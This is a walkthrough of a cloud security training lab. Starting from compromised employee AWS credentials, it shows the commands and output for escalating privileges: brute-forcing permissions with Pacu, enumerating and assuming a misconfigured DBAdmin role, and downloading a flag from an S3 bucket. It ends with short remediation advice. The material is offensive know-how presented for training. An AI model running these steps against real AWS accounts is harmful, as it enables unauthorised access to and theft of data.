Trust Me Walkthrough
Lab Info
Section titled “Lab Info”Lab Name: Trust Me
Platform: Infinity Learning
Welcome to Secure Corp, a leading organization with a growing cloud infrastructure. Recently, a security audit raised concerns about potential misconfigurations in IAM roles and permissions. As a Red Team Specialist, your mission is to investigate IAM permissions, uncover vulnerabilities in the trust relationship of IAM roles, and exploit them to escalate privileges.
Your initial foothold? You’ve gained access to an employee’s AWS credentials. Can you use them to pivot, escalate privileges, and retrieve the flag hidden inside an S3 bucket?
Initial Access:
You start the challenge with the AWS credentials of an employee user. Your objective is to investigate IAM roles, identify misconfigurations, assume a privileged role, and retrieve the hidden flag.
AWS Resources:
The organization has Users, Roles, and Policies to manage the workflow, and an S3 Bucket to store data.
Attack Flow
Section titled “Attack Flow”.png)
This detailed write-up demonstrates IAM privilege escalation through misconfigured role trust relationships. Starting from compromised employee credentials, systematic enumeration reveals assumable roles, leading to S3 data access and flag retrieval.
Complete Attack Steps with Commands
Section titled “Complete Attack Steps with Commands”1. Initial Access & Whoami
Section titled “1. Initial Access & Whoami”aws configure --profile Track_MeAWS Access Key ID [None]: [REDACTED_AWS_ACCESS_KEY_ID]AWS Secret Access Key [None]: [REDACTED_AWS_SECRET_ACCESS_KEY]Default region name [None]: us-east-1Default output format [None]: json1.1 Validate identity
Section titled “1.1 Validate identity”aws sts get-caller-identity --profile Track_Me{ "UserId": "[REDACTED_AWS_USERID]", "Account": "058264439561", "Arn": "arn:aws:iam::058264439561:user/Backend_Developer"}2. Bruteforce Permissions (Pacu)
Section titled “2. Bruteforce Permissions (Pacu)”run iam__bruteforce_permissionsRunning module iam__bruteforce_permissions...[iam__bruteforce_permissions] Enumerated IAM Permissions:[iam__bruteforce_permissions] Enumerating us-east-12025-11-28 13:08:57,972 - 6811 - [INFO] Starting permission enumeration for access-key-id "[REDACTED_AWS_ACCESS_KEY_ID]"2025-11-28 13:08:59,565 - 6811 - [INFO] -- Account ARN : arn:aws:iam::058264439561:user/Backend_Developer2025-11-28 13:08:59,565 - 6811 - [INFO] -- Account Id : 0582644395612025-11-28 13:08:59,565 - 6811 - [INFO] -- Account Path: user/Backend_Developer2025-11-28 13:08:59,863 - 6811 - [INFO] Attempting common-service describe / list brute force.2025-11-28 13:09:04,387 - 6811 - [ERROR] Remove globalaccelerator.describe_accelerator_attributes action2025-11-28 13:09:09,750 - 6811 - [ERROR] Remove codedeploy.get_deployment_target action2025-11-28 13:09:09,751 - 6811 - [ERROR] Remove codedeploy.batch_get_deployment_targets action2025-11-28 13:09:11,960 - 6811 - [ERROR] Remove codedeploy.list_deployment_targets action2025-11-28 13:09:14,377 - 6811 - [INFO] -- dynamodb.describe_endpoints() worked!2025-11-28 13:09:14,461 - 6811 - [INFO] -- sts.get_session_token() worked!2025-11-28 13:09:14,751 - 6811 - [INFO] -- sts.get_caller_identity() worked!Key Findings:
dynamodb.describe_endpoints()sts.get_session_token()sts.get_caller_identity()
3. Enumerate Assumable Roles
Section titled “3. Enumerate Assumable Roles”python3 assume_role_enum.py -p Trust_Me -i 058264439561 -w wordlist.txtTargeting account ID: 058264439561
Starting role enumeration...
{"Credentials": {"AccessKeyId": "[REDACTED_AWS_ACCESS_KEY_ID]","SecretAccessKey": "[REDACTED_AWS_SECRET_ACCESS_KEY]","SessionToken": "[REDACTED_AWS_SESSION_TOKEN]","Expiration": "[REDACTED]"},"AssumedRoleUser": {"AssumedRoleId": "[REDACTED]","Arn": "[REDACTED]"}}Output: Discovered DBAdmin role assumable by current user.
4. Assume DBAdmin Role
Section titled “4. Assume DBAdmin Role”Temporary credentials received:
Create profile:
aws configure --profile DBadmin set aws_access_key_id [REDACTED_AWS_ACCESS_KEY_ID]aws configure --profile DBadmin set aws_secret_access_key [REDACTED_AWS_SECRET_ACCESS_KEY]aws configure --profile DBadmin set aws_session_token [REDACTED_AWS_SESSION_TOKEN]5. Enumerate DBAdmin Role Policies
Section titled “5. Enumerate DBAdmin Role Policies”aws iam list-attached-role-policies --role-name DBAdmin --profile DBadminOutput:
{ "AttachedPolicies": [{ "PolicyName": "Manager_Access_S3", "PolicyArn": "arn:aws:iam::058264439561:policy/Manager_Access_S3" }]}6. Inspect Manager_Access_S3 Policy
Section titled “6. Inspect Manager_Access_S3 Policy”aws iam get-policy-version --policy-arn arn:aws:iam::058264439561:policy/Manager_Access_S3 --version-id v1 --profile DBadmin{ "PolicyVersion": { "Document": { "Statement": [ { "Action": [ "s3:GetObject", "s3:ListBucket" ], "Effect": "Allow", "Resource": [ "arn:aws:s3:::securecorpbakstoragebuk", "arn:aws:s3:::securecorpbakstoragebuk/*" ] }, { "Action": [ "iam:ListAttachedRolePolicies", "iam:GetPolicy", "iam:GetPolicyVersion", "iam:GetRolePolicy" ], "Effect": "Allow", "Resource": "arn:aws:iam::999909936336:role/DBAdmin" }, { "Action": [ "iam:GetPolicy", "iam:GetPolicyVersion" ], "Effect": "Allow", "Resource": "arn:aws:iam::999909936336:policy/Manager_Access_S3" } ], "Version": "2012-10-17" }, "VersionId": "v1", "IsDefaultVersion": false, "CreateDate": "2024-09-19T12:31:43+00:00" }}Key Permissions Found:
s3:GetObjectonarn:aws:s3:::securecorpbakstoragebuk/*s3:ListBucketonarn:aws:s3:::securecorpbakstoragebuk
7. List S3 Bucket Contents
Section titled “7. List S3 Bucket Contents”aws s3 ls s3://securecorpbakstoragebuk/ --profile DBadmin2024-09-19 18:01:57 28 Flag.txt- Found the flag. Let’s download it.
8. Retrieve Flag
Section titled “8. Retrieve Flag”aws s3 cp s3://securecorpbakstoragebuk/Flag.txt . --profile DBadmindownload: s3://securecorpbakstoragebuk/Flag.txt to ./Flag.txtcat Flag.txt[REDACTED_FLAG]Flag: [REDACTED_FLAG]
Remediation Steps
Section titled “Remediation Steps”- Trust Policy Misconfiguration: DBAdmin role trust allowed assumption by Backend_Developer.
- Defense: Implement MFA conditions, source IP restrictions, and monitor AssumeRole events.